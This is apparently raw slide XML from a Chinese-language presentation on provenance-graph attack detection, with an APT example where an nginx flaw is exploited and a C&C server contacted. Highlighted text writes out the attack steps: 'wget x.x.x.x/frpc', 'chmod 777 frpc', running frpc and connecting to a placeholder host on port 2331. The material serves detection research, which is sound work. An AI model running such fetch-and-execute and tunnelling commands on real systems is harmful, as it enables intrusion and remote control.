              <a:t>wget x.x.x.x/frpc</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4.&lt;bash, create, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>chmod 777 frpc</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5.&lt;bash, execute, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>./frpc -t xxxx -p 2331</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6.&lt;frpc, connet , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x.x.x.x:2331</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="右箭头 108"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId24"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829685" y="4539615"/>
            <a:ext cx="247015" cy="212090"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 58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0" name="文本框 109"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId25"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5155565" y="5419725"/>
            <a:ext cx="2400935" cy="275590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>溯源图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId26"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7727950" y="5263515"/>
            <a:ext cx="3504565" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>APT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击示例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击者通过恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>请求利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务漏洞，下载和执行恶意文件，外联远程命令与控制（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>C&amp;C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId27"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7827645" y="4144010"/>
            <a:ext cx="836295"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rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nginx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId28"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8933180" y="4144010"/>
            <a:ext cx="804545"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rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId29"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9956800" y="4144010"/>
            <a:ext cx="804545"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rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>下载</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId30"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9992995" y="4756150"/>
            <a:ext cx="804545"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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>提权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId31"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8987155" y="4756150"/>
            <a:ext cx="804545"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cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恶意文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId32"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693025" y="4756150"/>
            <a:ext cx="1017270" cy="389255"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远控服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="曲线连接符 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="10" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId33"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8663940" y="4338955"/>
            <a:ext cx="269240" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="curved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6" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId34"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9737725" y="4338955"/>
            <a:ext cx="219075" cy="3175"/>
          </a:xfrm>
          <a:prstGeom prst="curved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17" idx="3"/>
            <a:endCxn id="19" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId35"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10761345" y="4338955"/>
            <a:ext cx="36195" cy="612140"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 757895"/>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19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId36"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="9751695" y="4950460"/>
            <a:ext cx="241300" cy="4445"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4973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0" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId37"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8735695" y="4950460"/>
            <a:ext cx="251460" cy="20955"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4974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右箭头 26"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId38"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7207250" y="4539615"/>
            <a:ext cx="247015" cy="212090"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 58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9" name="标题 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{277A0906-6ECB-4541-8921-CE4E092E7E4A}"/>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检测算法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="99" name="图示 98"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3729746669"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1449816" y="2573746"/>
          <a:ext cx="2873375" cy="26193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100" name="文本框 99"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1370441" y="3878671"/>
            <a:ext cx="3152775" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="101" name="直接箭头连接符 100"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="102" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2883963" y="2764246"/>
            <a:ext cx="0" cy="2234685"/>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文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563337" y="4998931"/>
            <a:ext cx="640080" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2563337" y="2484330"/>
            <a:ext cx="640080" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724110" y="3694005"/>
            <a:ext cx="646331" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4469927" y="3680789"/>
            <a:ext cx="640080" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="矩形 105"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479402" y="4126956"/>
            <a:ext cx="1436687" cy="59075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黑</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="矩形 106"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7916089" y="4126956"/>
            <a:ext cx="2167822" cy="59075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灰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="矩形 110"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10083911" y="4126956"/>
            <a:ext cx="1037598" cy="5907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50"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>白</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="右箭头 111"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479402" y="3666706"/>
            <a:ext cx="1654775" cy="37147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3" name="右箭头 112"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
